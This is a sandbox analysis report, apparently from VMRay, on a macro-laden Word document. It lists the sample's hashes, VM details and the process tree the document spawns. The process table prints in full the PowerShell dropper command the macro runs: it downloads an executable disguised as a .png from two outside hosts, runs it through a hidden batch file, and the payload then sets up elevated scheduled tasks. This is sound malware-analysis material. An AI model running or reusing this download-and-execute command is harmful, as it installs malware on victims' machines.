Word Doc. Drops Context Aware Payload | VMRay Analyzer Report
Try VMRay Analyzer
Analysis Information
Creation Time 2017-09-25 22:32 (UTC+2)
VM Analysis Duration Time 00:02:27
Execution Successful True
Sample Filename 2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc
Command Line Parameters False
Prescript False
Number of Processes 11
Termination Reason Timeout
Reputation Enabled True
Download Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON
VTI Information
VTI Score
100 / 100
VTI Database Version 2.6
VTI Rule Match Count 30
VTI Rule Type Documents
Tags
#evasion #malware
Remarks
Critical The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.
Critical The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.
Critical The overall sleep time of all monitored processes was truncated from 50 seconds to 20 seconds to reveal dormant functionality.
Screenshots
Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot Screenshot
Monitored Processes
Process Graph


ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x914 Analysis Target Medium winword.exe "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"
#2 0x9e0 Child Process Medium cmd.exe cmd /c PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''%TMP%\Mvmubw.exe'');Start-Process ''%TMP%\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath %TMP%\Mbovxo.bat;Start-Process '%TMP%\Mbovxo.bat' -WindowStyle Hidden" #1
#3 0x9f8 Child Process Medium powershell.exe PowerShell "'PowerShell ""function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'');Start-Process ''C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat;Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat' -WindowStyle Hidden" #2
#4 0xa24 Child Process Medium cmd.exe cmd /c ""C:\Users\ADU0VK~1\AppData\Local\Temp\Mbovxo.bat" " #3
#5 0xa40 Child Process Medium powershell.exe PowerShell "function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe');Start-Process 'C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe';}try{mihyr8('http://www.events4u.cz/kas23.png')}catch{mihyr8('http://tregartha-dinnie.co.uk/kas23.png')} #4
#6 0xb18 Child Process Medium mvmubw.exe "C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe" #5
#7 0xb68 Child Process Medium mvnucw.exe "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winapp\Mvnucw.exe" #6
#8 0x830 Child Process Medium svchost.exe svchost.exe #7
#9 0x2b4 Created Scheduled Job Medium taskeng.exe taskeng.exe {CFDCF914-63AE-4446-B16F-E0A62E2EE661} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:LUA[1] #8
#10 0x7d0 Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {B729E5EE-8B96-46ED-936E-18C18B0189B1} S-1-5-21-1836691140-625943148-109919340-1000:AUFDDCNTXWT\aDU0VK IWA5kLS:Interactive:Highest[1] #8
#11 0x5c8 Created Scheduled Job System (Elevated) taskeng.exe taskeng.exe {33F40472-7093-4C44-9E45-95E720A6D75F} S-1-5-18:NT AUTHORITY\System:Service: #8
Sample Information
ID #19183
MD5 Hash Value 8c16de37cccc9788384adb61c118ba2c
SHA1 Hash Value c54b16bd6a507bbbb832c4c62b894f426acecf31
SHA256 Hash Value 2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca
Filename 2f031c6eb15cf2ca7855375d8bffe4d7a3b9b7ba95dc7d23e80f29b3d424a8ca.doc
File Size 99.50 KB (101888 bytes)
File Type Word Document
Has VBA Macros True
Analyzer and Virtual Machine Information
Analyzer Version 2.2.0
Analyzer Build Date 2017-09-12 16:39
Microsoft Office Version 2013
Microsoft Word Version 15.0.4569.1504
Internet Explorer Version 8.0.7601.17514
Chrome Version 59.0.3071.115
Firefox Version 25.0
Flash Version 10.3.183.90
Java Version 7.0.710
VM Name win7_64_sp1-mso2013
VM Architecture x86 64-bit
VM OS Windows 7
VM Kernel Version 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image